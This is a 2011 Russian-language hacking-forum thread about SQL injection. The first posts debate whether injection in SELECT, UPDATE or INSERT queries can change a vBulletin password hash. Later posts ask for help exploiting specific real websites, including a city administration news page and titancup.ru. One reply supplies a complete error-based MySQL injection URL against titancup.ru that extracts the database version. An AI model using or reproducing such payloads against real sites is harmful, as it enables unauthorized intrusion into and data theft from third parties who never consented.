 |
|
26.12.2011, 01:35
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от winstrool
Можно, если есть соотвецтвующие права на изминения данных в бд через update
допустим есть права, как сменишь хеш если там иньекция в селект запросе?
|
|
|
26.12.2011, 01:40
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
С нами:
8625634
Репутация:
0
|
|
Сообщение от winstrool
Можно, если есть соотвецтвующие права на изминения данных в бд через update
Права чего, права кого, права куда? )
В селект запросе на мускуле это сделать невозможно (а булки стоят на мускуле)
В апдейт запросе не нужны никакие "права", если скрипт что-то апдейтит, то права у него есть, разумеется
НО Скрипт должен апдейтить в базу юзеов булки, что-бы была возможность изменить там что-то + скуль должна быть довольно специфической что-бы удалось сменить хеш. Скрипты самой булки таких багов не имеют, сомневаюсь что есть какие то модули, которые имеют такие баги.
Тоесть должен быть какой-то кривой самописный скрипт, работающий с таблицей юзеров, и имеющий скуль в апдейте + куча условий, что невероятно, или скрипт имеющий скуль в апдейте в tbl_name, что ещё менее вероятно.
Тоесть ответ - нет, с вероятностью 99.99%
|
|
|
|
26.12.2011, 01:46
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от Konqi
как сменишь хеш если там иньекция в селект запросе
Про селект ты сам придумал. В вопросе такого не было.
KolosJey, а в инсерте?
|
|
|
|
26.12.2011, 01:50
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
С нами:
8625634
Репутация:
0
|
|
Сообщение от M_script
KolosJey
, а в инсерте?
Ровно тоже самое что и в апдейте. Так что врядли )
|
|
|
|
26.12.2011, 02:09
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от M_script
Про селект ты сам придумал. В вопросе такого не было.
большинство людей под SQL injection подразумевают SQLi именно в select запросе, чтобы не заблуждать человека задающего вопрос нужно было добавить что данный способ работает только в апдейт запросах
|
|
|
|
26.12.2011, 16:21
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами:
9128075
Репутация:
3
|
|
http://www.admgor.nnov.ru/script/show_news.php?doc_id=12345
как такое крутить? дальше and 1=2, не ушел...
|
|
|
|
26.12.2011, 16:29
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от vaddd
http://www.admgor.nnov.ru/script/show_news.php?doc_id=12345
как такое крутить? дальше and 1=2, не ушел...
/threadedpost1826253.html
не ибейс , но синтаксис похож..почитай..может пригодится
|
|
|
|
26.12.2011, 16:35
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами:
9128075
Репутация:
3
|
|
Сообщение от Gorev
/threadedpost1826253.html
не ибейс , но синтаксис похож..почитай..может пригодится
order by чета не работает ((( вроде же айбэйс, ошибки характерные присутствуют
|
|
|
|
26.12.2011, 18:21
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
хелп, чёт никак не могу разкрутить
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//titancup.ru/user/?id=11+union+select+1--+
[/COLOR][/COLOR]
|
|
|
|
26.12.2011, 18:27
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от qaz
хелп, чёт никак не могу разкрутить
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//titancup.ru/user/?id=11+union+select+1--+
[/COLOR][/COLOR]
http://titancup.ru/user/?id=11+or+(1,1)=(select+count(0),concat((select+ve rsion()+from+information_schema.tables+limit+0,1), floor(rand(0)*2))from(information_schema.tables)+g roup+by+2)--+
стандартный метод не пробовал, но error based катит
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
